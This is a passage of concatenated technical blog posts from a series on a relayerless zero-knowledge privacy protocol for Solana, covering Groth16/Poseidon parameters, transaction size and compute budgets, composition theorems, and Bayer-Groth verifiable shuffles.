The headline numbers: | Resource | Used by F_RP | Solana hard cap | Headroom | |----------|-------------|----------------|----------| | Transaction bytes | **656** | 1,232 (legacy) / 4,096 (SIMD-0296) | 576 / 3,440 | | Compute units | **~235,000** | 1,400,000 | 1,165,000 | | On-chain Groth16 verify | **~150,000** | (subset of CU above) | — | | Proof size (compressed) | **128** | (subset of bytes above) | — | This is post 8 of 11 in the [relayerless-privacy](/series/relayerless-privacy) series. ## Proof system: Groth16 over BN254 **Why Groth16, not PLONK or STARK.** Three reasons: 1. **128-byte compressed proof.** Smallest known SNARK output. Critical for Solana's 1,232-byte transaction envelope. 2. **`< 200,000 CU` verification on-chain.** The `sol_alt_bn128_group_op` and `sol_alt_bn128_pairing` syscalls (live since v1.16) make BN254 ops native to the validator runtime. 3. **Existing infrastructure.** Light Protocol's groth16-solana is already deployed; ZK Compression on mainnet uses it. PLONK is plausible once SIMD-0302 (BN254 G2 arithmetic syscall, in Review as of Q1 2026) activates — but as of writing, full G2 scalar multiplication is not a syscall, so KZG-based PLONK verification is impractical. STARKs are too big: a single STARK proof is ~50–200 KB, way over the transaction limit. Hybrid wrapping (STARK inner, Groth16 outer) gives the best of both — Theorem 3.8. | Parameter | Value | |-----------|-------| | Curve | BN254 (alt_bn128) | | Proof structure | π = (A ∈ 𝔾_1, B ∈ 𝔾_2, C ∈ 𝔾_1) | | Uncompressed size | 256 bytes (64 + 128 + 64) | | Compressed via `sol_alt_bn128_compression` | **128 bytes** | | Security level | ~128 bits (Barbulescu-Duquesne 2019 conservative estimate) | | Trusted setup | Per-circuit MPC (universal Powers-of-Tau phase 1 + circuit-specific phase 2) | ## Hash function: Poseidon over BN254 scalar field Poseidon is the standard SNARK-friendly hash for BN254 circuits. Solana ships it as a native syscall (`sol_poseidon`).
| Parameter | Value | |-----------|-------| | Field | `𝔽_p` where p = BN254 scalar field order | | State width | t = 3 (binary tree: 2 inputs → 1 output) | | S-box exponent | α = 5 (gcd(5, p-1) = 1 holds) | | Full rounds | R_F = 8 | | Partial rounds | R_P = 57 | | R1CS constraints per hash | 8·3·4 + 57·4 = 96 + 228 = **324** | | Native syscall | `sol_poseidon` (mainnet, v1.16+) | This is what Light Protocol's compressed-account commitments use. Same hash everywhere keeps the compressed-account ↔ F_RP boundary clean. ## Merkle trees Two trees, both Poseidon-based: ### Note commitment tree (depth 32) | Parameter | Value | |-----------|-------| | Depth | d = 32 | | Capacity | 2^32 ≈ 4.3 × 10^9 notes | | On-chain state | 32-byte root in PDA | | Off-chain state | Light Protocol ZK Compression (Solana ledger call data) | | Membership-proof circuit cost | 32 · 324 ≈ 10,400 R1CS constraints | ### Nullifier tree (Indexed Merkle, depth 32) The nullifier set needs efficient *non-membership* checks. Sparse Merkle Trees over 254-bit hashes would cost 254 · 324 ≈ 82,300 constraints per non-membership proof. Indexed Merkle Trees (Aztec's construction) drop this to depth 32: $$ C_{\mathsf{IMT-nonmem}} \;=\; 32 \cdot 324 + 324 + 256 \;\approx\; 10{,}948 \text{ R1CS constraints.} $$ A **7.5× reduction** at the cost of maintaining a sorted linked list off-chain. Aztec's design proves the "low nullifier" — the leaf where the new nullifier would slot in — and asserts the new value is in the gap. Two range checks plus a standard Merkle path. ## Pedersen commitments over BN254 𝔾_1 Used for value hiding inside SPST + range-proof aggregation. 
| Parameter | Value | |-----------|-------| | Group | BN254 𝔾_1 (prime order p ≈ 2^254) | | Generators | G, H ∈ 𝔾_1 with unknown DL relation | | Commitment | C = v · G + r · H | | Value range | v ∈ [0, 2^64) | | Range proof | In-circuit bit decomposition: 128 R1CS constraints / 64-bit value | | Homomorphism | C_1 + C_2 = Com(v_1 + v_2, r_1 + r_2) | **Why BN254 𝔾_1, not Curve25519?** Solana's native Twisted ElGamal commitments live on Ristretto255 / Curve25519. We don't reuse them for two reasons: 1. **Curve mismatch.** Groth16 needs pairing-friendly BN254. Solana's Ed25519 / Curve25519 is not pairing-friendly. Mixing the two would require expensive cross-curve gadgets. 2. **Different threat model.** Token-2022 confidential transfers hide *amounts*. F_RP needs to hide *amounts + senders + receivers + program logic*. The two are different protocols on different math; clean separation is correct. ## Key derivation The privacy framework uses its own key hierarchy, independent of the user's Solana Ed25519 keypair: | Key | Derivation | Purpose | |-----|-----------|---------| | Spending key sk | `sk ← {0,1}^256` random | Master secret | | Nullifier key nk | `Poseidon(sk, "nk")` | Derives nullifiers | | Public key pk | `sk · G` (G ∈ BN254 𝔾_1) | Identifies note owner | | Viewing key vk | `Poseidon(sk, "vk")` | Decrypts incoming notes | The Solana Ed25519 keypair signs the transaction envelope (paying the on-chain fee from the privacy program's reserve). The ZK proof internally proves authorisation via the spending key. 
**Compromise of one does not compromise the other.** ## Transaction layout A canonical 2-input / 2-output SPST transaction: | Component | Size (bytes) | Notes | |-----------|------|------| | Groth16 proof (compressed) | 128 | via `sol_alt_bn128_compression` | | Nullifiers (2 × 32) | 64 | Public input; checked against on-chain set | | Output commitments (2 × 32) | 64 | Poseidon hashes | | Merkle root | 32 | Anchors the proof to recent state | | Fee (u64) | 8 | Public, in lamports | | Encrypted note ciphertexts (2) | 128 | For recipient note discovery | | Anchor instruction discriminator | 8 | Standard Anchor program | | Account references (with ALT) | ~120 | Program ID, PDAs, system accounts | | Ed25519 signature | 64 | Transaction-level auth | | Transaction headers | ~40 | Recent blockhash, message header | | **Total** | **~656** | **Within 1,232-byte limit** | **Headroom: ~576 bytes.** Enough for: - A second Groth16 proof (composed PPST + SPST). - A 4-input / 4-output transaction instead of 2-in / 2-out. - Ring signature of size ~17 (instead of 64-byte simple Ed25519 sig) for in-tx anonymity. Under SIMD-0296 (4,096 bytes), the headroom triples. ## Compute unit budget | Operation | CU cost | Source | |-----------|---------|--------| | Groth16 verification (3 pairings + public-input MSMs) | ~150,000 | groth16-solana benchmarks | | Nullifier set check (2 PDA reads + comparison) | ~50,000 | Compressed account lookups | | Merkle root validation (1 PDA read) | ~10,000 | Light Protocol root cache | | Note insertion + state updates (compressed account write via CPI) | ~20,000 | ZK Compression v2 batched updates | | Borsh deserialization | ~5,000 | Standard overhead | | **Total** | **~235,000** | **16.8% of 1.4M CU limit** | Headroom: 1,165,000 CU. Enough for: - A second Groth16 verification (composed PPST + SPST): +150K → total 385K CU (27.5% of limit). - Auxiliary in-program Poseidon hashing via `sol_poseidon` for state derivations. 
- CPI calls to external programs (token transfers for unshielding, swap execution for atomic private DEX). ## Existing infrastructure used | Infrastructure | Integration point | Status | |---------------|-------------------|--------| | [Light Protocol / ZK Compression](https://www.zkcompression.com/resources/whitepaper) | Merkle tree state, compressed accounts | Production (mainnet) | | [`groth16-solana`](https://github.com/Lightprotocol/groth16-solana) verifier | Groth16 verification crate | Production | | `sol_poseidon` syscall | In-program Poseidon hashing | Live (mainnet, v1.16+) | | `sol_alt_bn128_group_op` syscalls | BN254 group ops for proof verification | Live (mainnet, v1.16+) | | `sol_alt_bn128_compression` | G1/G2 point compression | Live (mainnet) | | Address Lookup Tables | Compact account references | Production | | SIMD-0296 (4,096-byte transactions) | Extended tx envelope for ring sigs / PPST | Approved Q4 2025; pending activation | The protocol is **deployable today** with the legacy 1,232-byte transaction format. SIMD-0296 makes it more comfortable but isn't a hard prerequisite. ## What we still need from Solana For full F_RP, two SIMDs are nice-to-have: ### SIMD-0302 (BN254 G2 arithmetic syscall) Currently in Review. Adds native G2 scalar multiplication and addition. Without it, full PLONK / KZG verification on-chain is expensive (G2 ops in the BPF VM). With it, F_RP can switch to a universal SRS that doesn't need a per-circuit Groth16 ceremony. Estimated impact: PLONK verification ~400–600K CU vs Groth16's ~150K. Larger but eliminates per-circuit ceremony. Worthwhile tradeoff for a multi-program ecosystem. ### Re-activation of the ZK ElGamal Proof Program Currently disabled following the Phantom Challenge bug (Fiat-Shamir transcript missing a hash input — June 2025). When re-activated, F_RP can lean on the existing native sigma-proof / Bulletproofs verifier for some sub-protocols. Until then, all proofs go through the BN254 Groth16 path. 
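The byte and CU budgets earlier in this post are simple enough to re-derive mechanically. A minimal Rust sketch, with constants mirroring the two tables (a sanity check, not a wire-format definition):

```rust
// Re-derive the 2-in/2-out SPST budget totals from the layout tables.
// Constants mirror the tables in the post; this is a sanity check,
// not a wire-format definition.

const TX_BYTES: &[(&str, u32)] = &[
    ("Groth16 proof (compressed)", 128),
    ("nullifiers (2 x 32)", 64),
    ("output commitments (2 x 32)", 64),
    ("Merkle root", 32),
    ("fee (u64)", 8),
    ("encrypted note ciphertexts (2)", 128),
    ("Anchor discriminator", 8),
    ("account references (ALT)", 120),
    ("Ed25519 signature", 64),
    ("transaction headers", 40),
];

const CU_COSTS: &[(&str, u32)] = &[
    ("Groth16 verification", 150_000),
    ("nullifier set check", 50_000),
    ("Merkle root validation", 10_000),
    ("note insertion + state updates", 20_000),
    ("Borsh deserialization", 5_000),
];

fn total(items: &[(&str, u32)]) -> u32 {
    items.iter().map(|&(_, n)| n).sum()
}

fn main() {
    let bytes = total(TX_BYTES);
    let cu = total(CU_COSTS);
    println!("tx size: {bytes} B, legacy headroom: {} B", 1_232 - bytes);
    println!("cu: {cu}, share of 1.4M: {:.1}%", f64::from(cu) / 1_400_000.0 * 100.0);
}
```

Running it reproduces the 656-byte / 576-byte-headroom and 235K CU / 16.8% figures from the tables.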
## End-to-end latency budget For a 2-in / 2-out SPST transaction on commodity hardware: | Phase | Time | Notes | |-------|------|-------| | Read on-chain state (Merkle root + recent blockhash) | ~50 ms | RPC roundtrip | | Local proof generation (Apple M2, 8-core) | **0.5–1.5 s** | Dominated by FFT + MSM | | Transaction broadcast | ~50 ms | Direct to validator RPC | | Slot inclusion + finality | ~600 ms | Solana block time + confirmation | | **Total user-perceived latency** | **~1.5–3 s** | | Most of the latency is *prover time*, not chain time. A GPU prover (ICICLE on RTX 4090) drops this to ~300 ms. Browser-side proving via wasm-bindgen-rayon is workable but slower (~5–8 s) — discussed in [Proving in the browser, by the numbers](/blog/proving_in_the_browser_by_the_numbers/). ## What runs on the validators is intentionally boring On the chain side, F_RP is just three things: 1. A Solana program (Anchor-based) that verifies Groth16 + nullifier checks + state updates. 2. A Light Protocol-compatible Merkle tree state. 3. An on-chain account holding the protocol's lamport reserve (replenished from shield deposits, drained by validator fee extractions). That's it. No relayers, no off-chain operators, no governance multisig (other than for emergency pause). The boring deployment surface is the point. ## Bibliography - Light Protocol. *ZK Compression Whitepaper.* https://www.zkcompression.com/resources/whitepaper - Light Protocol. *groth16-solana on-chain verifier.* https://github.com/Lightprotocol/groth16-solana - Helius. *Zero-Knowledge Proofs: Applications on Solana.* https://www.helius.dev/blog/zero-knowledge-proofs-its-applications-on-solana - Solana Foundation. *Transactions documentation.* https://solana.com/docs/core/transactions - Solana Foundation. *SIMD-0296: Larger Transaction Format.* https://github.com/solana-foundation/solana-improvement-documents/blob/main/proposals/0296-larger-transactions.md - Solana Foundation. 
*SIMD-0302 (Review): BN254 G2 Arithmetic Syscalls.* https://github.com/solana-foundation/solana-improvement-documents/discussions/293 - Aztec Documentation. *Indexed Merkle Tree (Nullifier Tree).* https://docs.aztec.network/ - Grassi, L., Khovratovich, D., Rechberger, C., Roy, A., Schofnegger, M. (2021). *Poseidon.* USENIX Security 2021. https://eprint.iacr.org/2019/458 - Pedersen, T. P. (1991). *Non-Interactive and Information-Theoretic Secure Verifiable Secret Sharing.* CRYPTO 1991. Previous: [UPEE: composing the framework ←](/blog/upee_universal_private_execution/) · Next: [F_RP vs the rest →](/blog/f_rp_vs_existing_privacy_systems/) --- # UPEE: composing SPST + PPST + TAB into one framework Canonical: https://blog.skill-issue.dev/blog/upee_universal_private_execution/ Description: F_RP Construction IV. The five-algorithm tuple Setup/Deploy/Invoke/Verify/Finalize plus the simulation-based privacy theorem (3.12) and self-sovereignty theorem (3.13). The composition that makes the whole thing deployable. Published: 2026-05-08T16:00:00.000Z Tags: zk, cryptography, privacy, simulation-security, uc-framework, phd import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx"; [SPST](/blog/spst_self_paying_shielded_transactions/) gave us self-paying private value transfer. [PPST](/blog/ppst_private_programmable_state/) extended it to arbitrary computation. [TAB](/blog/tab_threshold_anonymous_broadcast/) and [verifiable shuffles](/blog/verifiable_shuffles_for_privacy/) closed the submitter-identification gap. Each of those is a self-contained construction. This post is about how they compose into the **deployable framework**. UPEE — the Universal Private Execution Environment — is a five-tuple `(Setup, Deploy, Invoke, Verify, Finalize)` that wraps the lower-level pieces in a single deployable interface. 
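To make the interface boundaries concrete before the formal definitions, here is a toy Rust walk-through of the five-tuple. The "proof" is a non-cryptographic checksum standing in for a SNARK, and every name and type is illustrative shorthand, not the real SDK surface; only the control flow matters.

```rust
// Toy model of the UPEE five-tuple (Setup, Deploy, Invoke, Verify, Finalize).
// The "proof" is a checksum standing in for a SNARK -- illustrative only.

fn digest(parts: &[&[u8]]) -> u64 {
    // Toy stand-in for a hash (FNV-1a); NOT cryptographic.
    parts
        .iter()
        .flat_map(|p| p.iter())
        .fold(0xcbf2_9ce4_8422_2325, |h, &b| (h ^ b as u64).wrapping_mul(0x100_0000_01b3))
}

#[allow(dead_code)]
struct PublicParams { lambda: u32 }
struct VerifyingKey { circuit_digest: u64 }
struct Tx { public_inputs: Vec<u8>, proof: u64 }

/// Setup(1^λ) → pp
fn setup(lambda: u32) -> PublicParams { PublicParams { lambda } }

/// Deploy(C, pp) → vk_C: in the real system this registers vk_C at a PDA.
fn deploy(circuit: &[u8], _pp: &PublicParams) -> VerifyingKey {
    VerifyingKey { circuit_digest: digest(&[circuit]) }
}

/// Invoke(C, state_priv, input_priv, pp) → tx: entirely client-side.
fn invoke(circuit: &[u8], state_priv: &[u8], input_priv: &[u8], _pp: &PublicParams) -> Tx {
    // Real public inputs would be nullifiers, commitments, root, fee;
    // here just a toy placeholder derived from input lengths.
    let public_inputs = vec![state_priv.len() as u8, input_priv.len() as u8];
    let proof = digest(&[circuit]) ^ digest(&[public_inputs.as_slice()]);
    Tx { public_inputs, proof }
}

/// Verify(vk_C, tx) → {0,1}: the only step that runs on-chain.
fn verify(vk: &VerifyingKey, tx: &Tx) -> bool {
    tx.proof == (vk.circuit_digest ^ digest(&[tx.public_inputs.as_slice()]))
}

/// Finalize(σ, tx) → σ': fold the tx into the state root.
fn finalize(state_root: u64, tx: &Tx) -> u64 {
    digest(&[&state_root.to_le_bytes()[..], tx.public_inputs.as_slice()])
}

fn main() {
    let pp = setup(128);
    let circuit = b"private-transfer-circuit";
    let vk = deploy(circuit, &pp);
    let tx = invoke(circuit, b"secret-note", b"secret-input", &pp);
    assert!(verify(&vk, &tx));
    println!("verified; new root = {:x}", finalize(0, &tx));
}
```

The shape to notice: `Invoke` touches the private data and never the chain; `Verify` touches the chain and never the private data.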
By the end of this post we'll have stated the two main theorems of F_RP — simulation-based privacy and self-sovereignty — and shown how they fall out of the composition. This is post 7 of 11 in the [relayerless-privacy](/series/relayerless-privacy) series. ## The five algorithms **`Setup(1^λ) → pp`.** Generate public parameters: SRS for the proof system (universal KZG or transparent FRI), Poseidon parameters, Merkle tree depth `d = 32`, Pedersen generators `G, H`, range-proof bit-length `ℓ_v = 64`, field `𝔽_p`. **`Deploy(C, pp) → vk_C`.** Compile a private program circuit `C` to an R1CS (or PLONKish) constraint system, run the proof system's key generator to produce `(pk_C, vk_C)`, register `vk_C` on-chain at a deterministic PDA `addr_C = PDA("UPEE", H(vk_C))`. **`Invoke(C, state_priv, input_priv, pp) → (tx, π)`.** Client-side, no chain interaction. Read current Merkle root, execute `C` locally on private state, build the witness, generate the Groth16 proof, assemble the transaction with encrypted note ciphertexts. **`Verify(vk_C, tx, π) → {0, 1}`.** On-chain. Single Groth16 pairing check + nullifier-set check + recent-root check + minimum-fee check. **`Finalize(σ, tx) → σ'`.** State transition. Insert nullifiers, append commitments to the Merkle tree, credit the validator with `f`. ## Hybrid proof architecture (§3.4.2) A single Groth16 proof can't directly hold a Turing-complete program at scale. Big circuits → big provers. The fix is **recursive composition**: <Mermaid chart={`flowchart TD A[Execute C
locally in PXE-style env] --> B[Inner STARK / Nova proof
~big circuit, transparent setup] B --> C[Wrap inner proof in Groth16
verify_inner = 1 inside outer circuit] C --> D[128-byte Groth16 proof
on-chain via alt_bn128] classDef step stroke:#4ade80,stroke-width:2px,fill:#0a0a0a,color:#fff class A,B,C,D step `}/> The outer Groth16 proof's circuit verifies the inner STARK or Nova accumulator. Composed soundness: $$ \epsilon_{\mathrm{hybrid}} \;\leq\; \epsilon_{\mathrm{inner}} + \epsilon_{\mathrm{outer}} + \mathsf{negl}(\lambda). $$ Concretely: STARK with FRI gives `ε_inner ≤ 2^{-100}` for the standard 30-query / blowup-4 parameters; Groth16 gives `ε_outer ≤ 2^{-100}` under q-PKE on BN254. Combined `ε_hybrid ≤ 2^{-99}` — the union bound costs one bit, no meaningful soundness loss. Zero-knowledge composes too: outer Groth16 reveals nothing about the inner STARK; the inner STARK reveals nothing about the witness. Both layers contribute ZK and they don't fight. ## The ideal functionality `F_RP` For the simulation-based proof we need a target. The ideal functionality: - On `(invoke, sid, C, state_priv, input_priv)` from user `U`: 1. Execute `C` locally, validate balance / range / membership. 2. Compute fee `f`. 3. Send `(transaction, sid, f)` to the adversary `A`. *That's all `A` learns.* 4. On `proceed` from `A`, update ideal state, ack to `U`. - On `(query, sid)` from `A`: return `(rt, N, f)` (the public state). `F_RP` never tells `A`: - which notes were consumed (only nullifiers); - which notes were created (only commitments); - the values, recipients, or program inputs; - the user's identity beyond what the fee `f` and the fact-of-existence reveal. This is also all the adversary should be able to learn in the real world.
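The leakage interface can be made concrete with a toy projection (every field name here is illustrative; this models the message flow, not real code): two invocations that differ only in their private data must produce identical adversary views.

```rust
// Toy projection of F_RP's per-invoke leakage. The invoke message carries
// private fields; the adversary's view keeps only (transaction, sid, f).
// Field names are illustrative, not protocol definitions.

#[allow(dead_code)]
struct InvokeMsg {
    sid: u64,
    circuit: &'static str,    // which program ran -- never leaked
    state_priv: Vec<u64>,     // note values consumed -- never leaked
    input_priv: Vec<u64>,     // program inputs -- never leaked
    recipient: &'static str,  // never leaked
    fee: u64,                 // the one value the adversary sees
}

/// What `A` receives on an invoke: `(transaction, sid, f)` and nothing else.
fn adversary_view(msg: &InvokeMsg) -> (&'static str, u64, u64) {
    ("transaction", msg.sid, msg.fee)
}

fn main() {
    let a = InvokeMsg {
        sid: 7, circuit: "transfer", state_priv: vec![500],
        input_priv: vec![42], recipient: "alice", fee: 3,
    };
    // Same sid and fee, completely different private data and program.
    let b = InvokeMsg {
        sid: 7, circuit: "swap", state_priv: vec![1, 2, 3],
        input_priv: vec![], recipient: "bob", fee: 3,
    };
    assert_eq!(adversary_view(&a), adversary_view(&b));
    println!("views identical: {:?}", adversary_view(&a));
}
```

Theorem 3.12 below is the formal version of this picture: whatever the real-world adversary sees, a simulator can produce from the `(sid, f)` projection alone.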
## Theorem 3.12 — simulation-based privacy **Statement.** For any PPT adversary `A` controlling the blockchain (full read of on-chain data, validator-side scheduling, transaction ordering), there exists a PPT simulator `S` such that: $$ \bigl\{\,\mathsf{View}_{\mathcal{A}}(\mathsf{Real}(\mathcal{A}, \mathcal{F}_{\mathrm{RP}}))\,\bigr\} \;\approx_c\; \bigl\{\,\mathsf{View}_{\mathcal{A}}(\mathsf{Ideal}(\mathcal{A}, \mathcal{S}))\,\bigr\} $$ where `S` learns only `(sid, f)` from `F_RP`. **Proof outline.** The simulator builds a fake transaction that is computationally indistinguishable from a real one without ever seeing the witness: 1. **Simulated nullifiers.** For each of `n_in` inputs, sample `nf_i` uniformly at random, verify it isn't already in `N`, retry on collision. 2. **Simulated commitments.** For each of `n_out` outputs, sample `r_j` uniformly and set `cm_j = Poseidon(r_j)`. Indistinguishable from real commitments by the hiding property of Poseidon. 3. **Simulated proof.** Invoke the ZK simulator of the hybrid proof system: `π̃ ← Sim_ZK(vk_C, x̃)` for `x̃ = ({nf_i}, {cm_j}, rt, f)`. For Groth16, `Sim_ZK` uses the simulation trapdoor `(α, β, γ, δ)` from the CRS to forge a valid-looking proof without a witness. 4. **Simulated encrypted notes.** For each output, sample a uniform-random ciphertext of the right length. Indistinguishable by CCA2 of the encryption scheme. The hybrid argument moves from the real distribution to the simulator's output through four hybrids, each indistinguishable from the previous one under one cryptographic assumption: - `H_0` → `H_1`: replace real proof with simulated proof. Bound: `ZK advantage of Π_hybrid`. - `H_1` → `H_2`: replace real commitments with random `Poseidon(r̃_j)`. Bound: `n_out · PRF advantage of Poseidon`. - `H_2` → `H_3`: replace real nullifiers with uniform random values. Bound: `n_in · PRF advantage`. - `H_3` → `H_4 = Sim`: replace real ciphertexts with random strings. 
Bound: `n_out · CCA2 advantage of the encryption scheme`. By the triangle inequality, the total distinguishing advantage is the sum of four negligible quantities — itself negligible. ∎ ## Theorem 3.13 — self-sovereignty This is the result that makes F_RP *relayerless*. **Game `Game_RF(A, λ)`.** Single honest user `U`. `A` controls all relayers, all other users, the entire network layer (delay/reorder/drop), and all off-chain infrastructure. `U` has a shielded note, the corresponding spending key, the ability to read the chain, and direct network access to at least one honest validator. `Game_RF = 1` if `U` successfully completes withdrawal of `v' ≤ v` to a public address of their choosing, paying `f` from the shielded balance, in a polynomial number of steps. **Statement.** $$ \Pr[\mathsf{Game}_{\mathrm{RF}}(\mathcal{A}, \lambda) = 1] \;=\; 1 - \mathsf{negl}(\lambda). $$ **Proof.** Walk through every phase of the withdrawal and confirm the user can do it alone: | Operation | Required resources | External party? | |-----------|-------------------|-----------------| | Read Merkle root | RPC (or direct ledger read) | No — public data | | Compute Merkle path | Local tree + on-chain commitment data | No | | Compute nullifier `PRF_sk(ρ)` | Local secret key | No | | Build witness | Local | No | | Generate Groth16 proof | Local CPU/GPU | No | | Sign tx | Local Ed25519 key (or TAB share) | No | | Broadcast tx | Direct connection to ≥1 honest validator | No (chain liveness) | | Pay fee `f` | Inside the proof — extracted from shielded balance | **No (SPST)** | Every row's "External party?" is "No". The single assumption is **`(Δ, p_live)`-liveness of the chain**: any valid transaction is included within Δ blocks with probability ≥ 1 − negl(λ). On Solana, `Δ ≈ 1–2 slots` (sub-second confirmation) and `p_live` follows from Tower BFT's liveness guarantees.
The success probability is: $$ \Pr[\mathsf{Game}_{\mathrm{RF}} = 1] \;=\; \Pr[\text{liveness holds}] \cdot \Pr[\text{honest proof verifies}] \;=\; (1 - \mathsf{negl}(\lambda)) \cdot 1. $$ The second factor is `1` by completeness of the proof system. ∎ **Corollary (Censorship Resistance).** No adversary can prevent the user from exercising their private withdrawal right, assuming only chain liveness. This is strictly stronger than every relayer-dependent protocol, where adversarial control of the relayer set is sufficient to deny service. ## Composability of UPEE programs Three composition modes from §3.4.5: ### Sequential composition `P_A ; P_B` Run `P_A` to commit intermediate state, wait for finality, then run `P_B` consuming that state. Soundness composes additively: $$ \epsilon_{\mathrm{seq}} \;\leq\; \epsilon_A + \epsilon_B + \mathsf{negl}(\lambda). $$ ### Parallel composition `P_A ‖ P_B` Both programs run in the same transaction over disjoint state. The combined circuit `C_{A‖B}` is satisfied iff both `C_A` and `C_B` are. Soundness: $$ \epsilon_{A \| B} \;\leq\; \epsilon_A + \epsilon_B + \mathsf{negl}(\lambda). $$ ### Nested composition `P_A[P_B]` `P_A` calls `P_B` as a subroutine. State passes through Pedersen-committed values: $$ \mathsf{call}(P_B, \mathsf{Com}(\vec{\mathrm{args}}), \pi_{\mathrm{args\_valid}}) \;\to\; (\mathsf{Com}(\vec{\mathrm{result}}), \pi_{\mathrm{exec}}). $$ The caller verifies `π_exec` recursively inside its own circuit. Soundness includes a recursion-overhead term: $$ \epsilon_{\mathrm{nested}} \;\leq\; \epsilon_A + \epsilon_B + \epsilon_{\mathrm{recursive}} + \mathsf{negl}(\lambda). $$ `ε_recursive` is bounded by Theorem 3.8 (composed soundness of the hybrid proof architecture). ## What's left We have the framework. We have the theorems. The question now is: does this actually fit on Solana?
The next post drops the abstract `Π_hybrid` and gives concrete numbers — proof sizes in bytes, verification costs in CU, transaction layouts inside the 1,232-byte limit. ## Bibliography - Canetti, R. (2001). *Universally Composable Security: A New Paradigm for Cryptographic Protocols.* FOCS 2001. - Goldwasser, S., Micali, S., Rackoff, C. (1985). *The Knowledge Complexity of Interactive Proof-Systems.* STOC 1985. - Groth, J. (2016). *On the Size of Pairing-Based Non-Interactive Arguments.* EUROCRYPT 2016. - Ben-Sasson, E. et al. (2018). *Scalable, transparent, and post-quantum secure computational integrity (STARKs).* https://eprint.iacr.org/2018/046 - Kothapalli, A., Setty, S., Tzialla, I. (2022). *Nova: Recursive Zero-Knowledge Arguments from Folding Schemes.* https://eprint.iacr.org/2021/370 Previous: [Verifiable shuffles ←](/blog/verifiable_shuffles_for_privacy/) · Next: [Solana instantiation: 656 bytes →](/blog/solana_instantiation_656_bytes/) --- # Bayer-Groth verifiable shuffles for network-layer privacy Canonical: https://blog.skill-issue.dev/blog/verifiable_shuffles_for_privacy/ Description: F_RP Construction III, Approach C. Bayer-Groth verifiable shuffles obscure the input→output permutation of a batch with O(√n) proof size — used to cascade-mix pre-broadcast batches at the network layer. Published: 2026-05-06T15:00:00.000Z Tags: zk, cryptography, shuffles, mixnet, privacy, phd import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx"; [Ring signatures and TAB](/blog/tab_threshold_anonymous_broadcast/) hide the submitter on-chain. They don't hide the **packet**: the TCP/QUIC frame that hits a Solana RPC node still has a source IP, a timing signature, and a propagation pattern. A passive adversary running a handful of nodes can do timing triangulation to identify which IP first broadcast a transaction, and that IP is enough to undo the cryptographic anonymity. 
This is post 6 of 11 in the [relayerless-privacy](/series/relayerless-privacy) series. The construction here addresses the network layer with **verifiable shuffles** — a primitive that lets a third party shuffle and re-randomise a batch of encrypted transactions without learning the permutation, then prove they did so honestly. ## What a verifiable shuffle is A vector of ElGamal ciphertexts arrives at a "shuffler" — a party (or chain of parties) that: 1. Permutes the order of the ciphertexts. 2. Re-randomises each ciphertext (changes the encryption randomness without changing the plaintext). 3. Outputs a new vector that is provably a permutation-and-re-randomisation of the input. Crucially, the shuffler's permutation π is **secret**. The proof attests "this output is some valid shuffle of the input" without revealing which one. **Definition.** Let `vec(C) = (C_1, ..., C_n)` be ElGamal ciphertexts encrypting messages `M_i` under a common public key `pk_dec`. A verifiable shuffle protocol produces: $$ \big(\,\vec{C}',\ \pi_{\mathrm{shuffle}}\,\big) \;\leftarrow\; \mathsf{Shuffle}(\vec{C}, \mathsf{pk}_{\mathrm{dec}}) $$ where `vec(C')` is a re-randomised permutation of `vec(C)` and the proof `π_shuffle` allows public verification without revealing π. For each `i ∈ [n]`: $$ C'_i \;=\; C_{\pi^{-1}(i)} + (r'_i \cdot G,\ r'_i \cdot \mathsf{pk}_{\mathrm{dec}}) $$ with `r'_i` sampled fresh. ## Bayer-Groth shuffle argument The Bayer-Groth construction [BG12] gives an honest-verifier zero-knowledge argument with **O(√n) proof size**. The pieces: ### 1. Permutation matrix commitment The shuffler commits to the permutation matrix `M_π ∈ {0,1}^{n×n}` using a Pedersen vector commitment: $$ \mathsf{Com}(\vec{a}) \;=\; \sum_{i=1}^n a_i \cdot H_i \;+\; r \cdot G, $$ where `vec(a)` encodes the permutation and `H_1, ..., H_n` are independent generators. ### 2. 
Multi-exponentiation argument For a verifier challenge `vec(x) = (x_1, ..., x_n)`, the shuffler proves: $$ \prod_{i=1}^n (C_i)^{x_{\pi(i)}} \cdot \mathsf{rerand} \;=\; \prod_{i=1}^n (C'_i)^{x_i}. $$ This is a batched ElGamal homomorphism check that forces the shuffle to be a valid permutation with correct re-randomisation. ### 3. Permutation argument (Schwartz-Zippel) The committed `(a_1, ..., a_n)` form a permutation of `(1, ..., n)` if and only if the polynomial identity $$ \prod_{i=1}^n (a_i - x) \;=\; \prod_{i=1}^n (i - x) $$ holds. The shuffler proves it by evaluating both sides at a random verifier-supplied `x`. Two distinct degree-`n` polynomials agree at a uniformly random point with probability at most `n/|𝔽|` (Schwartz-Zippel), so agreement at a random `x` implies identity with overwhelming probability. ### Sublinear proof via recursive blocks Bayer-Groth's main contribution is the recursive block structure that pushes proof size to O(√n). Split the n elements into √n blocks of √n; commit to each block; recurse. Verifier cost remains O(n) multi-scalar multiplications for the main check, plus O(√n) group exponentiations for the permutation argument (the construction is pairing-free). ## Theorem 3.11 — shuffle privacy **Statement.** Under the DDH assumption on the underlying group and the zero-knowledge property of the Bayer-Groth argument, for any two permutations `π_0, π_1 ∈ S_n` and any PPT adversary observing `(vec(C), vec(C'), π_shuffle)`: $$ \bigl|\,\Pr[\mathcal{A}(\vec{C}, \mathsf{Shuffle}_{\pi_0}(\vec{C}), \pi_{\mathrm{shuffle}}) = 1] \;-\; \Pr[\mathcal{A}(\vec{C}, \mathsf{Shuffle}_{\pi_1}(\vec{C}), \pi_{\mathrm{shuffle}}) = 1]\,\bigr| \;\leq\; \mathsf{Adv}^{\mathsf{DDH}}_{\mathcal{A}}(\lambda) + \mathsf{negl}(\lambda). $$ **Proof sketch.** Reduce permutation identification to DDH. The reduction `B` receives a DDH challenge `(G, A = a·G, B = b·G, Z)` and sets `pk_dec = A`. To simulate the shuffle: - If `Z = ab·G` (real DDH tuple): `B` re-randomises position `i` using `r'_i = b` and the DDH structure correctly produces a valid shuffle under `π_0`.
